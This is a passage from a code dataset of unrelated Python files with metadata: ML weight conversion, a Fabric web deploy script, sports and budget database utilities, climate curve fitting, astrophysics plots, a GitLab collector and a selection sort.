get_float_tensor_from_cntk_convolutional_weight_value_shape(tensorValue, tensorShape):\n \"\"\"Returns an ell.math.FloatTensor from a trainable parameter\n Note that ELL's ordering is row, column, channel.\n 4D parameters (e.g. those that represent convolutional weights) are stacked vertically in the row dimension.\n CNTK has them in filter, channel, row, column order.\n \"\"\"\n if (len(tensorShape) == 4):\n orderedWeights = np.moveaxis(tensorValue, 1, -1)\n orderedWeights = orderedWeights.ravel().astype(np.float).reshape(\n tensorShape[0] * tensorShape[2], tensorShape[3], tensorShape[1])\n elif (len(tensorShape) == 3):\n orderedWeights = np.moveaxis(tensorValue, 0, -1)\n orderedWeights = orderedWeights.ravel().astype(np.float).reshape(\n tensorShape[1], tensorShape[2], tensorShape[0])\n elif (len(tensorShape) == 2):\n orderedWeights = np.moveaxis(tensorValue, 0, -1)\n orderedWeights = orderedWeights.ravel().astype(\n np.float).reshape(tensorShape[1], tensorShape[0], 1)\n else:\n orderedWeights = tensorValue.ravel().astype(\n np.float).reshape(1, 1, tensorValue.size)\n return ell.math.FloatTensor(orderedWeights)","sub_path":"tools/importers/CNTK/lib/cntk_converters.py","file_name":"cntk_converters.py","file_ext":"py","file_size_in_byte":6690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"249942014","text":"#!/usr/bin/python3\nfrom os import path\nfrom fabric.operations import put, run\nfrom fabric.state import env\n\n\ndef do_deploy(archive_path):\n \"\"\"This function distributes an archive to web servers\"\"\"\n env.hosts = ['35.231.246.19', '34.227.48.93']\n if not path.exists(archive_path):\n return False\n try:\n archive_name = archive_path[9:]\n dest_path = \"/tmp/\" + archive_name\n filename = archive_name[:-4] + \"/\"\n release_path = \"/data/web_static/releases/\"\n frp = release_path + filename\n put(archive_path, dest_path)\n cmd_string = \"mkdir -p \" + frp\n run(cmd_string)\n cmd_string2 = \"tar -xzf \" + dest_path + \" -C \" + frp\n run(cmd_string2)\n cmd_string3 = \"rm \" + dest_path\n run(cmd_string3)\n cmd_string4 = \"mv \" + frp + \"web_static/* \" + frp\n run(cmd_string4)\n cmd_string5 = \"rm -rf \" + frp + \"web_static\"\n run(cmd_string5)\n cmd_string6 = \"rm -rf /data/web_static/current\"\n run(cmd_string6)\n cmd_string7 = \"ln -s \" + frp + \" /data/web_static/current\"\n run(cmd_string7)\n except:\n return False\n return True\n","sub_path":"2-do_deploy_web_static.py","file_name":"2-do_deploy_web_static.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"528574411","text":"import pandas as pd\nfrom .db_config import Session\nfrom nba_data.processing.nba_game_starters import GameStarter\n\ndef remove_error_period_starters(game_ids):\n session = Session()\n period_starters_query = session.query(GameStarter).filter(GameStarter.game_id.in_(game_ids))\n period_starters = pd.read_sql_query(period_starters_query.statement, session.bind)\n starters_error_ids = []\n for group, df in period_starters.groupby(['sport','season','game_id','period',\n 'team_id']):\n starters_error_ids.append(df.sort_values(by=['min'], ascending=False)[5:])\n if starters_error_ids:\n starters_error_ids = list(pd.concat(starters_error_ids, axis=0)['id'].values)\n else:\n starters_error_ids = []\n for error_id in starters_error_ids:\n delete_records = session.query(GameStarter).filter(GameStarter.id==str(error_id))\n delete_records.delete(synchronize_session=False)\n session.commit()\n session.close()\n return True\n","sub_path":"nba_data/processing/process_error_period_starters.py","file_name":"process_error_period_starters.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"598149167","text":"import numpy as np\nimport sqlite3\nimport time\n\ndef new(folder, name):\n conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n\n c = conn.cursor()\n\n #Definer din sql kommando\n command = \"\"\"CREATE TABLE budget\n (amount FLOAT, allocate FLOAT, account INTEGER, category TEXT, day INTEGER, month INTEGER, year INTEGER, memo TEXT);\n \"\"\"\n c.execute(command)\n #HUSK at commit'e! \n conn.commit()\n\n #Når du er færdig kan du lukke forbindelsen\n conn.close()\n\ndef income(amount,account,date=0,memo=0,folder='data',name='budget'):\n conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n c = conn.cursor()\n transaction = (amount, account.title())\n\n if date == 0:\n transaction = transaction + (int(time.strftime(\"%d\")), int(time.strftime(\"%m\")),int(time.strftime(\"%Y\")),)\n else:\n dato = date.split('/')\n transaction = transaction + (int(dato[0]),int(dato[1]),int(dato[2]),)\n\n if memo != 0:\n transaction = transaction + (memo,)\n c.execute('INSERT INTO budget (amount, account, day, month, year, memo) VALUES (?,?,?,?,?,?)',transaction)\n else:\n c.execute('INSERT INTO budget (amount, account, day, month, year) VALUES (?,?,?,?,?)',transaction)\n\n conn.commit()\n conn.close()\n\ndef newtransaction(category,amount,account,accountto=0,date=0,memo=0,folder='data',name='budget'):\n conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n c = conn.cursor()\n\n transaction = (-amount,account.title(), category.title())\n\n if date == 0:\n transaction = transaction + (int(time.strftime(\"%d\")), int(time.strftime(\"%m\")),int(time.strftime(\"%Y\")),)\n else:\n dato = date.split('/')\n transaction = transaction + (int(dato[0]),int(dato[1]),int(dato[2]),)\n\n if memo != 0:\n transaction = transaction + (memo,)\n c.execute('INSERT INTO budget (amount, account, category, day, month, year, memo) VALUES (?,?,?,?,?,?,?)',transaction)\n else:\n c.execute('INSERT INTO budget (amount, account, category, day, month, year) VALUES (?,?,?,?,?,?)',transaction)\n conn.commit()\n conn.close()\n\ndef allocate(category,amount,date=0,folder='data',name='budget'):\n allocation = (category.title(), amount)\n if date == 0:\n day = int(time.strftime(\"%d\"))\n month = int(time.strftime(\"%m\"))\n year = int(time.strftime(\"%Y\"))\n\n else:\n dato = date.split('/')\n day = int(dato[0])\n month = int(dato[1])\n year = int(dato[2])\n allocation = allocation + (day,month,year,)\n conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n c = conn.cursor()\n c.execute('INSERT INTO budget (category,allocate, day, month, year) VALUES (?,?,?,?,?)',allocation)\n conn.commit()\n conn.close()\n\ndef accountinfo(folder='data',name='budget',month=0):\n conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n c = conn.cursor()\n overview = []\n if month == 0:\n month = int(time.strftime(\"%m\"))\n for row in c.execute('SELECT SUM(amount), account FROM budget WHERE account IS NOT NULL GROUP BY account;'):\n overview.append(row)\n just=15\n print(\"Kontooverblik\")\n print(\"\".ljust(just*4,'-'))\n for element in overview:\n print(\"{}:\".format(element[1]).ljust(just)+\"{}\".format(element[0]).ljust(just))\n conn.commit()\n conn.close()\n\ndef update(wrong_columns,wrong_input,new_input,folder='data',name='budget'):\n conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n c = conn.cursor()\n if wrong_columns.lower()=='category':\n c.execute(\"\"\"UPDATE budget SET category = ? WHERE category=?;\"\"\",(new_input.title(),wrong_input.title()))\n elif wrongcolumns.lower()=='account':\n c.execute(\"\"\"UPDATE budget SET account = ? WHERE account=?;\"\"\",(new_input.title(),wrong_input.title()))\n conn.commit()\n conn.close()\n\ndef showtransactions(folder='data',name='budget',month=0):\n conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n c = conn.cursor()\n overview = []\n if month == 0:\n month = int(time.strftime(\"%m\"))\n for row in c.execute('SELECT amount, category, memo, account FROM budget WHERE month=? AND allocate IS NULL;',(month,)):\n overview.append(row)\n month_translate = {1:'januar',2:'februar',3:'marts',4:'april',5:'maj',6:'juni',7:'juli',8:'august',9:'september',10:'oktober',11:'november',12:'december'}\n dist = 20\n print(\"Følgende transaktioner er foretaget i {} måned\".format(month_translate[month]))\n print(\"\")\n print(\"Konto\".ljust(dist)+\"Beløb\".ljust(dist)+\"Kategori\".ljust(dist)+\"Memo\".ljust(dist))\n print(\"\".ljust(4*dist,'-'))\n for i in range(0,len(overview)):\n if overview[i][1]==None:\n lst = list(overview[i])\n lst[1]=\"Indkomst\"\n overview[i]=tuple(lst)\n for element in overview:\n if element[2]==None:\n print(\"{}\".format(element[3]).ljust(dist)+\"{}\".format(element[0]).ljust(dist)+\"{}\".format(element[1]).ljust(dist))\n else:\n print(\"{}\".format(element[3]).ljust(dist)+\"{}\".format(element[0]).ljust(dist)+\"{}\".format(element[1]).ljust(dist)+\"{}\".format(memo))\n conn.commit()\n conn.close()\n\ndef showbudget(folder='data',name='budget',month=0):\n month_translate = {1:'januar',2:'februar',3:'marts',4:'april',5:'maj',6:'juni',7:'juli',8:'august',9:'september',10:'oktober',11:'november',12:'december'}\n conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n c = conn.cursor()\n budget_month = []\n budget_tot = []\n if month == 0:\n month=int(time.strftime(\"%m\"))\n\n #Okay, first I'll look what's been budgeted and spend this month\n for row in c.execute('SELECT SUM(amount), SUM(allocate), category FROM budget WHERE month=? AND category IS NOT NULL GROUP BY category;',(month,)):\n budget_month.append(row)\n\n #And compare total income to total amount budgeted\n to_be_budgeted = []\n for row in c.execute(\"\"\"SELECT SUM(amount) FROM budget WHERE amount>0;\"\"\"):\n to_be_budgeted.append(row)\n for row in c.execute(\"\"\"SELECT SUM(allocate) FROM budget;\"\"\"):\n to_be_budgeted.append(row)\n\n #Which I'll need to substract any non liqued assets\n aktier = []\n for row in c.execute(\"\"\"SELECT SUM(amount) FROM budget WHERE account='Aktier';\"\"\"):\n aktier.append(row)\n if aktier[0][0]==None:\n aktier=[[0]]\n\n for row in c.execute('SELECT SUM(amount), SUM(allocate), category FROM budget WHERE category IS NOT NULL GROUP BY category;'):\n budget_tot.append(row)\n\n print_var = []\n for element in budget_tot:\n for thing in budget_month:\n if thing[2]==element[2]:\n print_var.append(element + (thing[0],thing[1],))\n\n just = 20\n faste = ['Husleje','Fællesindkøb']\n variable =['Telefon','Forsikring','Medicin','Tøj', 'Gaver', 'Elektronik','Streaming','Uforudsete Faste','Studie','Transport']\n fun = ['Byen','Fælles Hygge', 'Musik Og Film','Sjov']\n future = ['Overskud Til Hygge','Lejlighed', 'Sydafrika', 'Emergency']\n\n print(\"\")\n print(\"Budget for {} måned\".format(month_translate[month]))\n print(\"To be Budgeted: {0:.2f}\".format(to_be_budgeted[0][0]-to_be_budgeted[1][0]-aktier[0][0]))\n print(\"\".ljust(4*just,'-'))\n print(\"Kategori\".ljust(just)+\"Budgetteret\".ljust(just)+\"Forbrug\".ljust(just)+\"Tilgængeligt\".ljust(just))\n print(\"\".ljust(4*just,'-'))\n for i in range(0,len(print_var)):\n for j in range(0,len(print_var[i])):\n if print_var[i][j] == None:\n lst = list(print_var[i])\n lst[j]=0\n print_var[i]=tuple(lst)\n print(\"\")\n print(\"Faste Udgifter\")\n print(\"\".ljust(just*4,'-'))\n antal = 0\n for i in range(0,len(print_var)):\n if len(print_var[i])==5 and print_var[i][2] in faste:\n antal = antal+1\n faste.remove(print_var[i][2])\n print(\"{}\".format(print_var[i][2]).ljust(just)+\"{0:.2f}\".format(print_var[i][4]).ljust(just)+\"{0:.2f}\".format(abs(print_var[i][3])).ljust(just)+\"{0:.2f}\".format(print_var[i][1]+print_var[i][0]).ljust(just))\n for i in range(0,len(faste)):\n print(\"{}\".format(faste[i]).ljust(just))\n print(\"\")\n print(\"Variable\")\n print(\"\".ljust(just*4,'-'))\n for i in range(0,len(print_var)):\n if len(print_var[i])==5 and print_var[i][2] in variable:\n variable.remove(print_var[i][2])\n antal = antal+1\n print(\"{}\".format(print_var[i][2]).ljust(just)+\"{0:.2f}\".format(print_var[i][4]).ljust(just)+\"{0:.2f}\".format(abs(print_var[i][3])).ljust(just)+\"{0:.2f}\".format(print_var[i][1]+print_var[i][0]).ljust(just))\n for i in range(0,len(variable)):\n print(\"{}\".format(variable[i]).ljust(just))\n print(\"\")\n print(\"Sjov og Hygge\")\n print(\"\".ljust(just*4,'-'))\n for i in range(0,len(print_var)):\n if len(print_var[i])==5 and print_var[i][2] in fun:\n fun.remove(print_var[i][2])\n antal = antal+1\n print(\"{}\".format(print_var[i][2]).ljust(just)+\"{0:.2f}\".format(print_var[i][4]).ljust(just)+\"{0:.2f}\".format(abs(print_var[i][3])).ljust(just)+\"{0:.2f}\".format(print_var[i][1]+print_var[i][0]).ljust(just))\n for i in range(0,len(fun)):\n print(\"{}\".format(fun[i]).ljust(just))\n print(\"\")\n print(\"Fremtid\")\n print(\"\".ljust(just*4,'-'))\n for i in range(0,len(print_var)):\n if len(print_var[i])==5 and print_var[i][2] in future:\n future.remove(print_var[i][2])\n antal = antal+1\n print(\"{}\".format(print_var[i][2]).ljust(just)+\"{0:.2f}\".format(print_var[i][4]).ljust(just)+\"{0:.2f}\".format(abs(print_var[i][3])).ljust(just)+\"{0:.2f}\".format(print_var[i][1]+print_var[i][0]).ljust(just))\n for i in range(0,len(future)):\n print(\"{}\".format(future[i]).ljust(just))\n if (antal-len(print_var))!=0:\n print(\"\")\n print(\"Uden for Kategori\")\n print(\"\".ljust(just*4,'-'))\n for i in range(0,len(print_var)):\n if len(print_var[i])==5 and not (print_var[i][2] in faste or print_var[i][2] in variable or print_var[i][2] in fun or print_var[i][2] in future):\n print(\"{}\".format(print_var[i][2]).ljust(just)+\"{0:.2f}\".format(print_var[i][4]).ljust(just)+\"{0:.2f}\".format(abs(print_var[i][3])).ljust(just)+\"{0:.2f}\".format(print_var[i][1]+print_var[i][0]).ljust(just))\n conn.commit()\n conn.close()\n\nmappe = 'data'\ndatabase = 'budget'\n","sub_path":"budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":10413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"647308861","text":"import temperature_CO2_plotter as plotter\nimport numpy as np\nimport scipy.optimize as opt\nimport matplotlib.pyplot as plt\n\n\ndef CO2_extrapolate(x, a, b, d, e, g) :\n\t\"\"\"\n\tFunction used to extrapolate the CO2 levels (as a function of time).\n\n\t\t@param \tx \t\t\tyears\n\t\t@param \ta,...,g \tparameters used for curve fitting\n\t\t@return \t\t\tpolynomial plus exponential value\n\t\"\"\"\n\treturn a + b*x + d*np.exp(e*(x-g))\n\n\ndef T_extrapolate(x, a, b, c) :\n\t\"\"\"\n\tFunction used to extrapolate the T (as a function of the CO2 levels).\n\n\t\t@param \tx \t\t\tCO2 levels\n\t\t@param \ta,...,c \tparameters used for curve fitting\n\t\t@return \t\t\tpolynomial value\n\t\"\"\"\n\treturn a + b*x + c*x**2\n\n\ndef extrapolateCO2(month='January', yearsInFuture=20, plotting=False) :\n\t\"\"\"\n\tExtrapolate the CO2 levels (as function of time), the temperature (as \n\tfunction of CO2 levels), and the temperature as a function of time (based on\n\tthe aforementioned CO2 levels [as a function of time]).\n\n\tA second order polynomial and an exponential is used to fit the CO2 levels,\n\twhile a second order polynomial alone is used to fit the temperature.\n\n\t\t@param \tmonth \t\tthe month for which we are extrapolating temperature \n\t\t\t\t\t\t\tinto the future\n\t\t@param \tplotting \tif true, the CO2(time), the T(CO2), and the T(time)\n\t\t\t\t\t\t\tplots are shown.\n\t\t@return \t\t\tan array of years, along with an array of predicted \n\t\t\t\t\t\t\tCO2 levels and the actual CO2 levels observed, and\n\t\t\t\t\t\t\talso the predicted T and the actual T observed\n\t\"\"\"\n\tmonth \t\t\t= month.capitalize()\n\tyearCO2, CO2 \t= plotter.findCO2()\n\tyearT, T \t\t= plotter.findTemperature(month)\n\tyf \t\t\t\t= yearsInFuture\n\n\t# Ensure year and CO2 are _true_ 1D numpy arrays (N,) dim, not (N,1) dim.\n\tyearCO2 = np.ravel(yearCO2)\n\tyearT \t= np.ravel(yearT)\n\tCO2 \t= np.ravel(CO2)\n\tT \t\t= np.ravel(T)\n\tCO2T \t= CO2[65:]\n\n\t# Let scipy find the optimal parameters for the CO2(year) interpolation.\n\toptimalParamsCO2, cov = opt.curve_fit(CO2_extrapolate, yearCO2, CO2, \\\n\t\t\t\t\t\t\t\t\t bounds=([-100.,0.,0.,0.,0.],\\\n\t\t\t\t\t\t\t\t\t \t\t [100.,10.,3e-2,3e-2,2e3]))\n\toptimalParamsTaverage = np.asarray([0.,0.,0.])\n\n\t# Lets find the optimal third degree polynomial to fit T as a function of \n\t# CO2 for every month of the year (excluding the constant part).\n\tfor tmpmonth in [\t'January'\t, \t\\\n\t\t\t\t\t\t'February'\t, \t\\\n\t\t\t\t\t\t'March'\t\t, \t\\\n\t\t\t\t\t\t'April'\t\t, \t\\\n\t\t\t\t\t\t'May'\t\t, \t\\\n\t\t\t\t\t\t'June'\t\t, \t\\\n\t\t\t\t\t\t'July'\t\t, \t\\\n\t\t\t\t\t\t'August'\t, \t\\\n\t\t\t\t\t\t'September'\t, \t\\\n\t\t\t\t\t\t'October'\t, \t\\\n\t\t\t\t\t\t'November'\t, \t\\\n\t\t\t\t\t\t'December'\t\t\t] :\n\t\n\t\ttmpYear, tmpT \t= plotter.findTemperature(tmpmonth)\n\t\ttmpT \t\t\t= np.ravel(tmpT)\n\n\t\t# Let scipy find the optimal parameters for the T(CO2) interpolation.\n\t\ttmpoptimalParamsT, cov = opt.curve_fit(T_extrapolate, CO2T, tmpT, \\\n\t\t\t\t\t\t\t\t\t\t\t \tbounds=([-10.,0.,-10.], \\\n\t\t\t\t\t\t\t\t\t\t\t \t\t\t[30.,10.,10.]))\n\t\toptimalParamsTaverage[1:] += tmpoptimalParamsT[1:]\n\t\tif tmpmonth == month :\n\t\t\toptimalParamsTaverage[0] = 12. * tmpoptimalParamsT[0]\n\t\n\t# Take the actual best fit to be the average of all the months parameters.\n\t# The constant term is taken only for the month in question.\n\toptimalParamsT = optimalParamsTaverage / 12.\n\tyearPlusCO2 = np.linspace(min(yearCO2), max(yearCO2)+yf,len(yearCO2)*100)\n\tyearPlusT \t= np.linspace(min(yearT), max(yearT)+yf, len(yearT)*100)\n\n\tif plotting :\n\t\t# Visualize CO2 as a function of time, and the extrapolation.\n\t\tfig = plt.figure(100)\n\t\tplt.plot(yearCO2, CO2)\n\t\tplt.hold('on')\n\t\tplt.plot(yearPlusCO2, CO2_extrapolate(yearPlusCO2, *optimalParamsCO2))\n\n\t\t# Visualize T as a function of CO2.\n\t\tfig = plt.figure(101)\n\t\tplt.plot(CO2T, T, 'ro')\n\t\tplt.hold('on')\n\t\tplt.plot(CO2T, T_extrapolate(CO2T, *optimalParamsT), 'b-')\n\n\t\t# Visualize T as a function of time, and the extrapolation based on CO2 \n\t\t# levels.\n\t\tfig = plt.figure(102)\n\t\tplt.plot(yearT, T, 'r-')\n\t\tplt.hold('on')\n\t\ttmpCO2 = CO2_extrapolate(yearPlusT, *optimalParamsCO2)\n\t\tplt.plot(yearPlusT, T_extrapolate(tmpCO2, *optimalParamsT), 'b--')\n\n\t\tplt.show()\n\n\treturn \tyearT \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t, \\\n\t\t\tyearPlusT \t\t\t\t\t\t\t\t\t\t\t\t\t\t, \\\n\t\t\tyearCO2 \t\t\t\t\t\t\t\t\t\t\t\t\t\t, \\\n\t\t\tyearPlusCO2\t\t\t\t\t\t\t\t\t\t\t\t\t\t, \\\n\t\t\tT \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t, \\\n\t\t\tCO2 \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t, \\\n\t\t\tCO2_extrapolate(yearPlusCO2, *optimalParamsCO2) \t\t\t\t, \\\n\t\t\tT_extrapolate(CO2_extrapolate(yearPlusT, *optimalParamsCO2) \t, \\\n\t\t\t\t\t\t *optimalParamsT)\n\n\nif __name__ == \"__main__\" :\n\textrapolateCO2(month='June', plotting=True)\n\n\n\n\n\n\n\n","sub_path":"assignment6/temperaturePredicter.py","file_name":"temperaturePredicter.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"18013366","text":"\"\"\"Show frbpoppy matches analytical models and predict the event rates.\"\"\"\nfrom matplotlib.lines import Line2D\nfrom matplotlib.patches import Patch\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom convenience import plot_aa_style, rel_path\nfrom rates_complex import complex_rates\nfrom rates_real import real_rates\nfrom rates_simple import simple_rates\nfrom rates_toy import toy_rates\n\nREMAKE = False\nSIZE = 1e8\nSURVEYS = ('palfa', 'htru', 'askap-fly', 'askap-incoh')\nALPHAS = np.around(np.linspace(-0.2, -2.5, 7), decimals=2)\n\n\ndef plot(toy, simple, complex, real):\n \"\"\"Plot rates panel.\"\"\"\n surveys = SURVEYS[:-1]\n\n plot_aa_style(cols=2)\n fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)\n cmap = plt.get_cmap('tab10')\n ax1.set_xlim((min(ALPHAS)+.1, max(ALPHAS)-.1))\n ax2.set_xlim((min(ALPHAS)+.1, max(ALPHAS)-.1))\n ax1.set_yscale('log', nonposy='mask')\n ax2.set_yscale('log', nonposy='mask')\n\n # Plot simple versus toy\n for i, surv in enumerate(surveys):\n ax1.plot(ALPHAS, toy[surv], color=cmap(i), linestyle='dotted',\n zorder=0)\n ax1.plot(ALPHAS, simple[surv], zorder=1)\n\n # Plot complex expectations\n for i, surv in enumerate(surveys):\n ax2.plot(ALPHAS, complex[surv], color=cmap(i), linestyle='dashed',\n zorder=1)\n\n # Plot real event rate boxes\n ma, mi = ax2.get_xlim()\n ma -= 0.05\n mi += 0.05\n size = 0.13\n z = 0\n for i, surv in enumerate(surveys):\n\n central, min_r, max_r = real[surv]\n\n left = mi - size\n right = ma + size\n\n x, y = zip(*[(ma, max_r), (right, max_r), (right, min_r), (ma, min_r)])\n ax1.fill(x, y, color=cmap(i), zorder=z)\n ax1.plot([ma, right+0.08], [central, central], color=cmap(i), zorder=z)\n\n x, y = zip(*[(mi, max_r), (left, max_r), (left, min_r), (mi, min_r)])\n ax2.fill(x, y, color=cmap(i), zorder=z)\n ax2.plot([mi, left-0.08], [central, central], color=cmap(i), zorder=z)\n\n size -= 0.02\n z += 1\n\n # Plot layout options\n # Set up axes\n ax1.set_xlabel(r'$\\alpha_{\\text{in}}$')\n ax1.invert_xaxis()\n ax1.set_ylabel('Events / htru')\n ax1.yaxis.set_ticks_position('left')\n ax1.title.set_text(r'\\textit{Simple} populations')\n\n ax2.set_xlabel(r'$\\alpha_{\\text{in}}$')\n ax2.invert_xaxis()\n ax2.yaxis.set_ticks_position('right')\n ax2.tick_params(labelright=False)\n ax2.title.set_text(r'\\textit{Complex} populations')\n\n # Set up layout options\n fig.subplots_adjust(hspace=0)\n fig.subplots_adjust(wspace=0)\n\n # Add legend elements\n elements = []\n for i, surv in enumerate(surveys):\n c = cmap(i)\n line = Line2D([0], [0], color=c)\n label = surv\n elements.append((line, label))\n\n # Add gap in legend\n elements.append((Line2D([0], [0], color='white'), ''))\n\n # Add line styles\n n = 'analytical'\n elements.append((Line2D([0], [0], color='gray', linestyle='dotted'), n))\n elements.append((Line2D([0], [0], color='gray'), 'simple'))\n elements.append((Line2D([0], [0], color='gray', linestyle='dashed'),\n 'complex'))\n\n # Add gap in legend\n elements.append((Line2D([0], [0], color='white'), ''))\n\n elements.append((Patch(facecolor='gray', edgecolor='gray', alpha=0.6),\n 'real'))\n\n lines, labels = zip(*elements)\n plt.legend(lines, labels, bbox_to_anchor=(1.04, 0.5), loc=\"center left\")\n\n plt.savefig(rel_path('plots/rates.pdf'), bbox_inches='tight')\n\n\ndef main():\n \"\"\"Get rates.\"\"\"\n toy = toy_rates(surveys=SURVEYS,\n alphas=ALPHAS)\n\n simple = simple_rates(remake=REMAKE,\n alphas=ALPHAS,\n size=SIZE,\n surveys=SURVEYS)\n\n complex = complex_rates(remake=REMAKE,\n alphas=ALPHAS,\n size=SIZE,\n surveys=SURVEYS)\n\n real = real_rates(surveys=SURVEYS)\n\n plot(toy, simple, complex, real)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tests/rates.py","file_name":"rates.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"395567793","text":"\"\"\"timetable URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\",views.home,name=\"home\"),\n path(\"register/\",views.register,name=\"register\"),\n path(\"register1/\",views.register1,name=\"register1\"),\n path(\"login/\",views.login,name=\"login\"),\n path(\"login1/\",views.login1,name=\"login1\"),\n path(\"college_details/\",views.college_details,name=\"college_details\"),\n path(\"success/\",views.success,name=\"success\"),\n\n\n]\n","sub_path":"timetable/institute/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"560368229","text":"from __future__ import print_function\nfrom googleapiclient.discovery import build\nfrom login import login\nfrom sheets import *\nfrom SheetCommand import SheetCommand\nfrom scopes import SPREADSHEETS_READONLY_SCOPE\n\n# ID and range of the spreadsheet\nSPREADSHEET_ID = MUSIC_SHEET\nRANGE_NAME = 'metal!B:B'\n\n\ndef print_songs_list():\n creds = login(SPREADSHEETS_READONLY_SCOPE)\n service = build('sheets', 'v4', credentials=creds)\n sheet_command = SheetCommand(service)\n result = sheet_command.get_values(SPREADSHEET_ID, RANGE_NAME)\n values = result.get('values', [])\n if not values:\n print('No data found.')\n else:\n print('Songs:')\n for row in values:\n print('%s' % (row[0]))\n","sub_path":"app/printSongsList.py","file_name":"printSongsList.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"410308532","text":"\"\"\"GitLab source up-to-dateness collector.\"\"\"\n\nimport asyncio\nimport itertools\nfrom urllib.parse import quote\n\nfrom dateutil.parser import parse\n\nfrom collector_utilities.functions import days_ago\nfrom collector_utilities.type import URL, Value\nfrom source_model import SourceResponses\n\nfrom .base import GitLabBase\n\n\nclass GitLabSourceUpToDateness(GitLabBase):\n \"\"\"Collector class to measure the up-to-dateness of a repo or folder/file in a repo.\"\"\"\n\n async def _api_url(self) -> URL:\n \"\"\"Override to return the API URL.\"\"\"\n return await self._gitlab_api_url(\"\")\n\n async def _landing_url(self, responses: SourceResponses) -> URL:\n \"\"\"Override to return a landing URL for the folder or file.\"\"\"\n if not responses:\n return await super()._landing_url(responses)\n web_url = (await responses[0].json())[\"web_url\"]\n branch = self._parameter(\"branch\", quote=True)\n file_path = self._parameter(\"file_path\", quote=True)\n return URL(f\"{web_url}/blob/{branch}/{file_path}\")\n\n async def _get_source_responses(self, *urls: URL) -> SourceResponses:\n \"\"\"Get the last commit metadata of the file or, in case of a folder, of the files in the folder, recursively.\"\"\"\n # First, get the project info so we can use the web url as landing url\n responses = await super()._get_source_responses(*urls)\n # Then, collect the commits\n responses.extend(await self.__get_commits_recursively(str(self._parameter(\"file_path\", quote=True))))\n return responses\n\n async def __get_commits_recursively(self, file_path: str, first_call: bool = True) -> SourceResponses:\n \"\"\"Get the commits of files recursively.\"\"\"\n tree_api = await self._gitlab_api_url(\n f\"repository/tree?path={file_path}&ref={self._parameter('branch', quote=True)}\"\n )\n tree_response = (await super()._get_source_responses(tree_api))[0]\n tree = await tree_response.json()\n file_paths = [quote(item[\"path\"], safe=\"\") for item in tree if item[\"type\"] == \"blob\"]\n folder_paths = [quote(item[\"path\"], safe=\"\") for item in tree if item[\"type\"] == \"tree\"]\n if not tree and first_call:\n file_paths = [file_path]\n commits = [self.__last_commit(file_path) for file_path in file_paths] + [\n self.__get_commits_recursively(folder_path, first_call=False) for folder_path in folder_paths\n ]\n return SourceResponses(responses=list(itertools.chain(*(await asyncio.gather(*commits)))))\n\n async def __last_commit(self, file_path: str) -> SourceResponses:\n \"\"\"Return the last, meaning the most recent, commit.\"\"\"\n files_api_url = await self._gitlab_api_url(\n f\"repository/files/{file_path}?ref={self._parameter('branch', quote=True)}\"\n )\n response = await self._session.head(files_api_url, headers=self._headers())\n last_commit_id = response.headers[\"X-Gitlab-Last-Commit-Id\"]\n commit_api_url = await self._gitlab_api_url(f\"repository/commits/{last_commit_id}\")\n return await super()._get_source_responses(commit_api_url)\n\n async def _parse_value(self, responses: SourceResponses) -> Value:\n \"\"\"Override to parse the dates from the commits.\"\"\"\n commit_responses = responses[1:]\n return str(days_ago(max([parse((await response.json())[\"committed_date\"]) for response in commit_responses])))\n","sub_path":"components/collector/src/source_collectors/gitlab/source_up_to_dateness.py","file_name":"source_up_to_dateness.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"470256292","text":"import sys\n\nsys.stdin = open('input.txt', 'r')\n\n\ndef the_largest(arr, last):\n largest = last\n for i in range(0, last + 1):\n if arr[i] > arr[largest]:\n largest = i\n\n return largest\n\n\ndef selection_sort(arr, n): # 정렬할 배열, 개수\n for last in range(n - 1, 0, -1): # 처음엔 n-1까지, 한번정렬 후 n-2까지, ..\n\n # arr[1..last] 중 가장 큰 수 arr[k]를 찾는다.\n k = the_largest(arr, last)\n # 두 값을 교환한다\n arr[last], arr[k] = arr[k], arr[last]\n\n return arr\n\n\nN = int(input())\n\nnumbers = [int(input()) for _ in range(N)]\n\nselection_sort(numbers, len(numbers))\n\nfor num in numbers:\n 